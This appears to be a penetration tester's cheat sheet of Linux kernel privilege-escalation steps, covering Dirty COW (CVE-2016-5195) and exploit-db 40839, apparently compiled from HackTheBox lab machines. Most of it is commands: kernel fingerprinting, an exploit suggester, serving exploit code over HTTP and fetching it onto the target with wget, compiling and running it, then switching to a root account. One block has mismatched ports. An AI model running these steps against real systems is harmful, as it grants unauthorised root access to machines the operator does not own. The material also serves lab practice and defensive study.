# 4 Kernel Exploits

##

| Family                  |                                                 | Versions                                                                                    |
| ----------------------- | ----------------------------------------------- | ------------------------------------------------------------------------------------------- |
| [Dirty Cow](#dirty-cow) | <p>CVE-2016-5195</p><p>Effective but Unsafe</p> | <p>Works on old kernels (ie: 2011/2012)<br>Kernel: 3.2.0</p><p>Ubuntu 12.04 (2012-2014)</p> |

## Version

```
uname -a       ..2011/2012 Kernel should be vuln to Dirty Cow
uname -a       ..debian 2.6.32  - Vulnerable
```

## Linux Versions

* <https://wiki.ubuntu.com/Releases>

## Linux-Exploit-Suggester-2

```
---------------
https://github.com/jondonas/linux-exploit-suggester-2
python -m SimpleHTTPServer 5555
wget http://$IP:4444/linux-exploit-suggester-2.pl

---------------
linux-exploit-suggester-2.pl -k 2.6.32          ..local
./linux-exploit-suggester-2.pl                  ..remote exe
```

## Dirty Cow

* [https://dirtycow.ninja](https://dirtycow.ninja/)
* Dirty COW is a privilege escalation vulnerability which exploits a race condition in the way the Linux kernel’s memory subsystem handles the copy-on-write (COW) breakage of private read-only memory mappings.
* Download > Scroll to Bottom > Pick most recent Release (ex: Firefart)
* REF: beepHTB, valentineHTB, lameHTB

```
dirty.c
https://github.com/FireFart/dirtycow/blob/master/dirty.c
git clone https://gist.github.com/e9d4ff65d703a9084e85fa9df083c679.git
python -m SimpleHTTPServer 4444
wget http://10.10.14.6:5555/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt
chmod 777 dirty
./dirty
backs up password to /tmp
newpassword
su firefart  ..root privs!
```

## Dirty c0w - older?

```
--------------------------------
uname -a                                       ..debian 2.6.32
searchsploit linux kernel 2.6.32 priv esc      ..some
searchsploit linux kernel 2.6 debian priv esc  ..nada
linux-exploit-suggester-2.pl -k 2.6.32         ..'dirty cow'

cat c0w.c                                      ..download/view
gcc -pthread c0w.c -o c0w                      ..complie
./c0w                                          ..exploit
privesc: /usr/bin/passwd                       ..result
whoami                                         ..root
cp /tmp/bak /usr/bin/passwd                    ..cleanup!
```

## 40839

* <https://www.exploit-db.com/exploits/40839>

```
uname -a                                     ..linux 2.6.24
searchsploit linux kernel 2.6.24 priv esc    ..search

searchsploit -m 40839.c                      ..copy
python -m SimpleHTTPServer 4444              ..transfer
wget http://$MyIP:4444/40839.c               ..get
gcc -pthread 40839.c -o 40839 -lcrypt        ..compile
./40839  (password)                          ..execute/set pw
su -                                         ..win
```